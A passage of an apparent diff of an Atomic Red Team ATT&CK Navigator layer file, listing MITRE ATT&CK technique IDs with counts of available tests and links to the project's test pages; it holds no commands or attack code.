Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}]},{"techniqueID":"T1559.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":118,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":52,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":28,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569.002","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]},{"techniqueID":"T1614","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1647","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1647/T1647.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file +{"name":"Atomic Red Team","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":49,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.001","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.004/T1021.004.md"}]},{"techniqueID":"T1021.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.005/T1021.005.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1030","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":51,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":67,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.002","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":34,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":7,"enabled":true,"links":[{"label":"View 